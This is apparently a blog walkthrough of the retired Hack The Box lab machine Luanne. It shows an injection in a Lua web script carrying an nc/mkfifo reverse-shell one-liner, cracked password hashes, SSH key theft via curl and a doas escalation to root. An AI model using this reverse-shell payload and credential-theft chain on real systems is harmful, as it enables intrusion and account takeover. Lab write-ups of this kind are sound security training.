Luanne Walkthrough ️

Dheeraj Deshmukh
7 min readMar 27, 2021

☠️ Hack The Box ☠️

Hello everyone..!! This is Walkthrough of the Luanne Machine which is now retired . Luanne Machine is rated difficulty level as easy , its release date is 28 Nov 2020 and retired date is 27 Mar 2021. Ip of the machine is . Let Start…

Port Scanning : Nmap

Command :

nmap -v -sC -sT -sV -A -p-

Output :

22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Uptime guess: 0.001 days (since Sat Mar 27 00:21:41 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=213 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
TRACEROUTE (using proto 1/icmp)
1 216.70 ms
2 216.88 ms luanne.htb (
NSE: Script Post-scanning.
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 2786.73 seconds
Raw packets sent: 94 (7.522KB) | Rcvd: 172 (36.766KB)

Port 80 Enumeration

From the port scanning we come to know about that the port 80 is open whics is assigned for http ( web service ) . On visiting to the port 80 we find that there is a basic authentication is put up for the web page .

After that i want to see source code of the page but there also it want username and password . Next step is directory bruteforcing.

Command :

dirsearch -u -E

Output :

  _|. _ _  _  _  _ _|_    v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 10023Error Log: /root/dirsearch/logs/errors-21–03–26_23–40–21.logTarget: File: /root/dirsearch/reports/–03–26_23–40–22.txt[23:40:22] Starting:
[23:41:38] 200–612B — /index.html
[23:42:01] 200–78B — /robots.txt
Task Completed

Here we found robots.txt, let see the content of robots.txt file

There is entry of weather directory and also a comment which gives us hint that on weathr directory there is 404 but still something is present on it , so now we have to visit on /weather directory.

As they said there is 404. But according to their hint something is present in directory , again we move toward the directory bruteforcing inside weather directory.


dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u -E

Output :

dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u -E_|. _ _ _ _ _ _|_ v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 220520Error Log: /root/dirsearch/logs/errors-21–03–27_00–19–22.logTarget: File: /root/dirsearch/reports/–03–27_00–19–22.txt[00:19:22] Starting:
[00:20:47] 200–90B — /weather/forecast
CTRL+C detected: Pausing threads, please wait…

We find forecast directory inside the weather and also we get hint to move forward, which is city=list.

Now we have to pass the city variable with list parameter as we seen in forecast page .

Output :

we get city name list to pass into the city .

Output :

We could not found any interesting thing inside this city name . On passing single quote there is some error .’

output :

Error is about the Lua script . Let search for the Lua on gtfobins

we found a function through which we can execute system command. From the output of nmap we come to know that the OS is running on this machine is openBSD . Now search for reverse shell for openBSD on github. and Resources/Reverse Shell

On this website we find all the oneliner reverse shell . We get reverse shell for BSD .

Now we have to make a payload to get the reverse shell.‘);os.execute(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4455 >/tmp/f”)-- 

Here, : Localhost of htb

4455 : port to get the reverse connection.

Now encrypt the payload.

Start the Listner on port 4455

nc -nlvp 4455

Now visit to the encrypted url and grab the shell.

We get shell of _httpd user.

On visiting home directory we find that there is 1 user r.michaels

I find .htpasswd file on analysing /var/www directory

$ cd /var/www$ ls -lah$ cat .htpasswd

We get a username and password hash .

To identify hash we use hash-identifier

We come to know that the hash is MD5(unix).

Now we have to crack the hast using hashcat.

hashcat --help | grep -i unix

500 is our hash number.

Now make ka file and put our hash inside it. for example : hash.txt

Run the following command to crack the hash .

hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

On completing this command run :

hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt --show

password for the hash is iamthebest

Now we have valid credentials .

webapi_user : iamthebest

This successfully work on the port 80 basic authentication , but htere is nothing special found.

Remember that ,on port 80 when we cancle the authentication then there is address According to this run the command

netstat -an

we found port 3000 and 3001 is running locally .

I have putted script on the shell using curl

curl --output /tmp/linpeas.shchmod +x

I get interesting thing which give me idea to use curl command.

r.michaels 185 0.0 0.0 35268 2008 ? Is 5:57AM 0:00.00 /usr/libexec/httpd -u -X -s -i -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/ -U r.michaels -b /home/r.michaels/devel/www

Now we use curl command to grab the ssh private key of the user

curl --user webapi_user:iamthebest

Finally we get the ssh private key.

Come back to your attacker pc make a file id_rsa and and puth the whole key inside it . Give the permission of 600 to id_rsa and now our key is ready .

# vim id_rsa (put the key inside it)# chmod 600 id_rsa

Now login to ssh for user r.michaels using id_rsa

ssh -i id_rsa r.michaels@

We get the user shell. Grab the user flag.

Now we have to root the machine.

On analysing directiories again I found hash inside /var/www/.htaccess

Crack the hash same as privious hash and we get the password littlebear

Now try this password to root the machine.Run the following command

doas su

Enter the password : littlebear

Finally we get root shell. Grab the root flag /root/root.txt and submit it .

And the happiness of seeing this window is on next leve 😍😍.